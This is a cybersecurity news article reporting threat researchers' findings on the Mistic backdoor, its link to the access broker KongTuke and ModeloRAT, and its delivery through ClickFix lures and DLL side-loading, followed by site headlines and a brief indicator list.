New Mistic Backdoor Linked to KongTuke in ClickFix and ModeloRAT Campaigns

Summary

A new stealthy backdoor named Mistic, also tracked as MLTBackdoor, has been deployed in financially motivated attacks since April 2026. It is linked to the initial access broker KongTuke and is dropped alongside ModeloRAT, a Python RAT. The attacks target sectors including insurance, education, IT, and professional services, with Mistic utilizing DLL side-loading and in-memory execution for stealth.

Full text

New Mistic Backdoor Linked to KongTuke in ClickFix and ModeloRAT Campaigns Ravie LakshmananJun 25, 2026Initial Access Broker / Ransomware A new, stealthy backdoor named Mistic has been deployed as part of suspected financially motivated attacks aimed at multiple organizations spanning insurance, education, IT, and professional services sectors since April 2026. According to Symantec and Carbon Black's Threat Hunter Team, the backdoor, also tracked as MLTBackdoor, is said to be linked to an initial access broker (IAB) named KongTuke (aka 404 TDS, Chaya_002, LandUpdate808, TAG-124, and Woodgnat), and dropped along with ModeloRAT, a Python remote access trojan (RAT) previously attributed to the group. "The backdoor runs payloads in memory with no file written to disk and includes a kill switch that lets it delete itself, which are features consistent with an operator seeking long-term, low-visibility access," Broadcom's cybersecurity teams said in a report shared with The Hacker News. ModeloRAT was first flagged by Huntress in January 2026 in connection with a variant of a ClickFix campaign dubbed CrashFix, in which the KongTuke actors used a malicious Google Chrome extension masquerading as an ad blocker to intentionally crash a victim's web browser and trick them into running arbitrary commands under the pretext of running a security scan. The malware was also distributed in a different ClickFix campaign that involved running commands carrying out a Domain Name System (DNS) lookup to retrieve the next-stage payload, with Microsoft noting that the attack chain uses DNS as a "lightweight staging or signaling channel." Mistic's use of ClickFix as a delivery vector was highlighted by Zscaler ThreatLabz earlier this month, attributing the activity to a ransomware-related threat actor to establish a foothold for lateral movement. The latest findings from Broadcom show that the malware relies on DLL side-loading techniques, using trusted Microsoft endpoint security tooling ("MpExtMs.exe") to blend in and avoid raising red flags. The backdoor runs directly in memory, enabling a wide range of capabilities typically associated with a malware family of this kind - Upload or download a file Move, rename, or delete a file Create a folder Modify the time interval after which it polls a remote server for commands Execute code received from C2 in memory without leaving any artifacts on disk Load Beacon Object Files (BOFs) to dynamically expand its capabilities Terminate and delete itself "The targeting appears to be opportunistic, with the attackers casting a wide net and then assessing which organizations they could sell access to rather than focusing on a single sector," Symantec and Carbon Black said, adding that ModeloRAT has been observed in attacks that deployed Qilin ransomware. KongTuke is known to operate a traffic distribution system (TDS) built on compromised WordPress sites, using it to serve an ever-evolving set of lures that lead unsuspecting site visitors to malware. As recently as last month, Rapid7 and ReliaQuest revealed that the threat actor has pivoted to sending Microsoft Teams messages from a fake IT Support account to trigger an attack chain that leads to the deployment of ModeloRAT. "The stealth of the backdoor is also notable, as is the fact that Woodgnat is also possibly behind the development of ModeloRAT, indicating a group that is quite highly skilled at the development of stealthy remote access tools," Broadcom said. "The use of custom tools in ransomware attacks is becoming a more common phenomenon, with multiple examples of ransomware groups using custom exfiltration and other tools in recent times. Backdoor.Mistic appears to be a continuation of this trend, though it appears to be likely developed by access brokers working with ransomware affiliates rather than a ransomware group itself." Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post. SHARE     Tweet Share Share Share SHARE  ClickFix, DLL side-loading, Initial Access Broker, Malware, Microsoft Teams, ransomware, WordPress ⚡ Top Stories This Week Chrome V8 Zero-Day CVE-2026-11645 Exploited in the Wild - Patch Now Researchers Build Self-Replicating AI Worm That Operates Entirely on Local, Open-Weight Models Microsoft Defender RoguePlanet Zero-Day Grants SYSTEM Access on Updated Windows Anthropic Releases Claude Fable 5, Its Most Powerful AI Yet, With Cyber Safeguards Microsoft Patches Record 206 Flaws, Including Three Zero-Days and Critical RCE Bugs Ivanti, Fortinet, and SAP Release Patches for Multiple Critical Vulnerabilities Cybersecurity Stars Awards 2026: Winners Announced Across 95 Categories ThreatsDay Bulletin: Worm Code Leaked, AI Agent Phished, Claude Code Patch + 28 New Stories New GreatXML Exploit Bypasses Windows BitLocker via Recovery Partition XML Files Agentjacking Attack Tricks AI Coding Agents Into Running Malicious Code China-Linked Hackers Backdoored Linux Login Software to Hide for Nearly a Decade Critical Splunk Enterprise Flaw Lets Attackers Run Code Without Authentication U.S. Orders Anthropic to Suspend Fable 5 and Mythos 5 Access for Foreign Nationals Over 400 Arch Linux AUR Packages Hijacked to Deploy Infostealer and eBPF Rootkit Palo Alto Warns of Active Exploitation of PAN-OS GlobalProtect VPN Flaw ⚡ Weekly Recap: Chrome 0-Day, UniFi Exploits, macOS Stealers, VPN Flaw and More ⭐ Featured Resources Get the 2026 Guide to Govern and Secure Enterprise AI Agents at Scale [Watch Demo] See Which Security Gaps Attackers Could Exploit First AI Can’t Stop Every Attack. Learn How Zero Trust Can Block What’s Unknown Have You Outgrown Your MDR? 7 Warning Signs Every CISO Should Check

Indicators of Compromise

• malware — Mistic
• malware — MLTBackdoor
• malware — ModeloRAT
• mitre_attack — T1059
• mitre_attack — T1071.004
• mitre_attack — T1574.002
• mitre_attack — T1055

Entities